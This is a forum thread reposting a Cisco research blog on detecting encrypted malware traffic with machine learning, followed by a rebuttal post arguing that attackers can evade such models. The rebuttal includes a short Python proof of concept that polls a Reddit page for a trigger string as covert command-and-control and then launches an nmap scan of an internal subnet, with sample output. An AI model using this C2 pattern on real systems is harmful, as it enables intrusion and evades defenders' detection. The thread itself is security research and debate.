Detecting Encrypted Malware Traffic (Without Decryption)

In2an3_PpG · Oct 19, 2018

Older blog but a good read.

Detecting Encrypted Malware Traffic (Without Decryption)

Introduction

Over the past 2 years, we have been systematically collecting and analyzing malware-generated packet captures. During this time, we have observed a steady increase in the percentage of malware samples using TLS-based encryption to evade detection. In August 2015, 2.21% of the malware samples used TLS, increasing to 21.44% in May 2017. During that same time frame, 0.12% of the malware samples used TLS and made no unencrypted connections with HTTP, increasing to 4.45%.

Identifying threats contained within encrypted network traffic poses a unique set of challenges. It is important to monitor this traffic for threats and malware, but do so in a way that maintains the privacy of the user. Because pattern matching is less effective in the presence of TLS sessions, we needed to develop new methods that can accurately detect malware communication in this setting [1,2,3]. To this end, we used the flow’s individual packet lengths and inter-arrival times to understand the behavioral characteristics of the transmitted data, and we used the TLS metadata contained in the ClientHello to understand the TLS client that is transmitting the data. We combine both of these views in a supervised machine learning framework allowing us to detect both known and unknown threats in TLS communication.

As an overview, Figure 1 provides a simplified view of a TLS session. In TLS 1.2 [4], the majority of the interesting TLS handshake messages are unencrypted, and are displayed in red in Figure 1. All of the TLS-specific information that we use for classification comes from the ClientHello, which will also be accessible in TLS 1.3 [7].

Data

Throughout the life of this project, we have maintained that the data is at the heart of our success. We have teamed with ThreatGrid and Cisco Infosec to acquire malicious packet captures and live enterprise data. These data feeds have helped to guide our analysis and develop the characteristics of a flow that are most informative. To provide some intuition about why the data features that we have analyzed are interesting, we first focus on a particular malware sample, bestafera, which is known for keylogging and data exfiltration.

Behavioral Analysis through Packet Lengths and Times

Figure 2 shows the packet lengths and inter-arrival for two different TLS sessions: a Google search in Figure 2a and a bestafera-initiated connection in Figure 2b. The x-axis represents time, the upward lines represent the size of packets that are sent from the client/source to the server/destination, and the downward lines represent the size of packets that are sent from the server to the client. The red lines again represent unencrypted messages, and the black lines are the sizes of the encrypted application_data records.

The Google search follows a typical pattern: the client’s initial request is in a small outbound packet, followed by large response spanning many MTU-sized packets. The several packets going back-and-forth are due to Google attempting to auto-complete my search while I was still typing. Finally, Google thought it had a pretty good idea what I was typing, and sent an updated set of results. The server that bestafera communicated with began by sending a packet containing a self-signed certificate, which can be seen as the first downward, thin red line in Figure 2b. After the handshake, the client immediately begins exfiltrating data to the server. There was a pause, and then the server sent a regularly schedule command and control message. Packet lengths and inter-arrival times can’t provide deep insight about the contents of a session, but they do facilitate inferences about the behavioral aspects of a session.

Fingerprinting the Application with TLS Metadata

The TLS ClientHello message provides two particularly interesting pieces of information that can be used to distinguish different TLS libraries and applications. The client offers a server a list of suitable cipher suites ordered in the preference of the client. Each cipher suite defines a set of methods, such as the encryption algorithm and pseudorandom function, that will be needed to establish a connection and transmit data using TLS. The client can also advertise a set of TLS extensions that, among other things, can provide the server with parameters needed for the key exchange, for example ec_point_formats.

The cipher suite offer vectors can vary in both the number of unique cipher suites offered and the different subgroups offered. Similarly, the list of extensions varies based on the context of the connection. Because most applications typically have different priorities, these lists can and do contain a great deal of discriminatory information in practice. As an example, desktop browsers tend to favor heavier weight, more secure encryption algorithms, mobile applications favor more efficient encryption algorithms, and the default cipher suite offer vector of clients bundled with TLS libraries typically offer a wider range of cipher suites to help with testing server configurations.

Most user-level applications, and by extension a large number of TLS connections seen in the wild, use popular TLS libraries such as BoringSSL, NSS, or OpenSSL. These applications usually have unique TLS fingerprints because the developer will modify the defaults of the library to optimize their application. To be more explicit, the TLS fingerprint for s_client from OpenSSL 1.0.1r will most likely be different than an application that uses OpenSSL 1.0.1r to communicate. This is also why bestafera’s TLS fingerprint is both interesting and unique: it uses the default settings of OpenSSL 1.0.1r to create its TLS connections.

Applying Machine Learning

Feature Representation

For this blog post, we have focused on straightforward feature representations of three data types: traditional NetFlow, packet lengths, and information taken from the TLS ClientHello. These data types are all extracted from a single TLS session, but we have also developed models that incorporate features from multiple flows [1]. All features were normalized to have zero mean and unit variance before training.

Legacy. We utilized 5 features that are present in traditional NetFlow: the duration of the flow, the number of packets sent from the client, the number of packets sent from the server, the number of bytes sent from the client, and the number of bytes sent from the server.

Sequence of Packet Lengths (SPL). We create a length-20 feature vector, where each entry is the corresponding packet size in the bidirectional flow. Packet sizes from the client to the server are positive, and packet sizes from the server to the client are negative.

TLS Metadata (TLS). We analyze both the offered cipher suite list and the list of advertised extensions contained in the ClientHello message. In our datasets, we observed 176 unique cipher suites and 21 unique extensions, which resulted in a length-197 binary feature vector. The appropriate feature is set to 1 if that cipher suite or extension appeared in the ClientHello message.

Learning

All of the presented results use the scikit-learn random forest implementation [6]. Based on previous longitudinal studies that we conducted, the number of trees in the ensemble was set to 125, and the number of features considered at each split of the tree was set to the square root of the total number of features. The feature set used by the random forest model was composed of some subset of the Legacy, SPL, and/or TLS features depending on the experiment.

Results

We sampled 1,621,910 TLS flows from one enterprise network, Site1, and 324,771 flows from ThreatGrid (collected between August 2015 and December 2016) to train our random forest model. We then simulated deploying the model on unseen data from a separate enterprise network, Site2, and malware data collected during the two months following the previous data set. There were 2,638,559 sampled TLS flows from Site2 and 57,822 TLS flows from ThreatGrid during January and February of 2017. Table 1 presents the results of this experiment at different thresholds. 0.5 is the default threshold of the classifier, and the higher the threshold, the more certain the trained model has to be to determine that the TLS flow was generated by malware. The malware/benign accuracies are kept separate to demonstrate feature subsets that overfit to a particular class. For example, Legacy can achieve near perfect accuracy on the benign set, but these features fail to generalize to the malware dataset.

At a threshold of 0.99, the classifier using the Legacy/SPL features correctly classified 98.95% of the benign samples, and 69.81% of the malicious samples. These results are significantly improved upon if we combine information about the application (TLS) with the behavioral characteristic of the network traffic (SPL). The combination of Legacy/SPL/TLS was the best performing model on the benign and malware samples. At a threshold of 0.95, this model achieved accuracies of 99.99% and 85.80% for the benign and malicious hold out datasets, respectively.

Conclusion

Decryption solutions are not ideal in all settings due to either privacy concerns, legal obligations, expense, or non-cooperating end-points. Cisco has devoted time (mine especially) to developing research and products to fill these gaps and compliment current solutions. Our validation studies on real network data have shown that we can achieve reliable detection with minimal false positives. In addition to engaging Cisco product teams to further develop this work, we have spent time engaging a broader external audience through open source [5] and academic papers [1,2,3].

In2an3_PpG · Oct 22, 2018

Here is a response from someone also glancing through the /r/netsec - Information Security News & Discussion sub-Reddit and reading the old blog posted above.

Defeating Cisco’s Machine Learning Based Malware Traffic Detection Algorithm | Digital Operatives

Defeating Cisco’s Machine Learning Based Malware Traffic Detection Algorithm

Reading /r/netsec today, I happened to come across this recycled old 2017 blog post from Cisco security about detecting malware by applying machine learning to encrypted communications.

Admittedly, it’s an interesting idea. At some point malware started using encrypted communications to get around intrusion detection signatures that detected unencrypted bot traffic. Defenders had to improve their detection.

The question I have though, is: “How realistic is it to detect a determined adversary who wants to evade a machine learning based approach to detecting C2?” From my perspective, pretty hard.

The Cisco blog post shows the success of their techniques on samples of malware from the wild. The story goes like this, researcher compiles lots of data, good and bad, uses Machine Learning techniques to draw something like the above image.

Researcher jumps up and down for joy, “I have 100% accuracy of detecting good traffic and 72.75% accuracy of detecting bad traffic!”
Here’s the problem. Attackers aren’t static. Once you deploy your model, attackers will build new C2 and test against it.

They’ll come up with something like this:

import urllib3

from subprocess import call

urllib3.disable_warnings()

conn = urllib3.connection_from_url('reddit: the front page of the internet')

r = conn.request('GET', '/r/netsec/')

print("Status: " + r.status)

if(bytes("Detecting Encrypted Malware Traffic (Without Decryption)", encoding='utf-8') in r.data):

print('Detected C2 Command - Launching portscan')

call('nmap -sT 10.0.0.0/24 -p 22 > output.txt', shell=True)

The result will be:

python3 browser_comm.py

Status: 200

Detected C2 Command - Launching portscan

Starting Nmap 7.70 ( Nmap: the Network Mapper - Free Security Scanner ) at 2018-10-19 16:10 EDT

Nmap scan report for 10.0.0.10

Host is up (0.0080s latency).

PORT STATE SERVICE

22/tcp closed ssh

Nmap scan report for 10.0.0.15

Host is up (0.014s latency).

PORT STATE SERVICE

22/tcp closed ssh

Nmap scan report for 10.0.0.61

Host is up (0.017s latency).

PORT STATE SERVICE

22/tcp open ssh

Nmap scan report for 10.0.0.71

Host is up (0.011s latency).

PORT STATE SERVICE

22/tcp closed ssh

Nmap done: 256 IP addresses (4 hosts up) scanned in 2.24 seconds

Process finished with exit code 0

Then they’ll sleep for a few days and upload the results.

What am I really showing you here? The code above goes to Reddit, pulls the subreddit, and triggers a command to launch if something is detected in the page. The web is an incredibly dynamic place. There are places to put arbitrary information to trigger C2, places to store payloads, and places to dump results. I’m not arguing that it’s impossible to distinguish good from bad, I’m suggesting bad has numerous
places to hide in what looks like good.

At the end of the day, determined attackers will attempt to fit the good model. A few years after they have success, some other researcher will claim to have a new model that detects old attacks. Rinse Repeat.

Search

Detecting Encrypted Malware Traffic (Without Decryption)

In2an3_PpG

Level 18

In2an3_PpG

Level 18

Similar threads